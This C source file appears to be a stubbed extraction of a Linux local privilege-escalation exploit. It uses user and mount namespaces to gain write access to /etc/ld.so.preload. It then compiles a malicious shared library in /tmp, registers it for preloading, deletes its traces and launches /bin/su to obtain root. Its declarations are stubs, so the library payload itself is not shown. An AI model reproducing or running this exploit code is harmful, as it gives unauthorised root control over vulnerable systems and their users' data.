
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef scalar_t__ pid_t ;


 int CLONE_NEWNS ;
 int CLONE_NEWUSER ;
 char* LIB ;
 int O_CREAT ;
 int O_WRONLY ;
 int SIGCHLD ;
 int child_exec ;
 scalar_t__ child_stack ;
 scalar_t__ clone (int ,scalar_t__,int,int *) ;
 int close (int) ;
 int execl (char*,char*,int *) ;
 int exit (int) ;
 scalar_t__ fork () ;
 int fprintf (int ,char*) ;
 int open (char*,int,...) ;
 int stderr ;
 int strlen (char*) ;
 int system (char*) ;
 scalar_t__ unshare (int ) ;
 int usleep (int) ;
 int wait (int *) ;
 int waitpid (scalar_t__,int*,int ) ;
 int write (int,char*,int) ;

int
main(int argc, char **argv)
{
    int status, fd, lib;
    pid_t wrapper, init;
    int clone_flags = CLONE_NEWNS | SIGCHLD;

    fprintf(stderr,"spawning threads\n");

    if((wrapper = fork()) == 0) {
        if(unshare(CLONE_NEWUSER) != 0)
            fprintf(stderr, "failed to create new user namespace\n");

        if((init = fork()) == 0) {
            pid_t pid =
                clone(child_exec, child_stack + (1024*1024), clone_flags, ((void*)0));
            if(pid < 0) {
                fprintf(stderr, "failed to create new mount namespace\n");
                exit(-1);
            }

            waitpid(pid, &status, 0);

        }

        waitpid(init, &status, 0);
        return 0;
    }

    usleep(300000);

    wait(((void*)0));

    fprintf(stderr,"child threads done\n");

    fd = open("/etc/ld.so.preload",O_WRONLY);

    if(fd == -1) {
        fprintf(stderr,"exploit failed\n");
        exit(-1);
    }

    fprintf(stderr,"/etc/ld.so.preload created\n");
    fprintf(stderr,"creating shared library\n");
    lib = open("/tmp/ofs-lib.c",O_CREAT|O_WRONLY,0777);
    write(lib,LIB,strlen(LIB));
    close(lib);
    lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");
    if(lib != 0) {
        fprintf(stderr,"couldn't create dynamic library\n");
        exit(-1);
    }
    write(fd,"/tmp/ofs-lib.so\n",16);
    close(fd);
    system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c");
    execl("/bin/su","su",((void*)0));
}
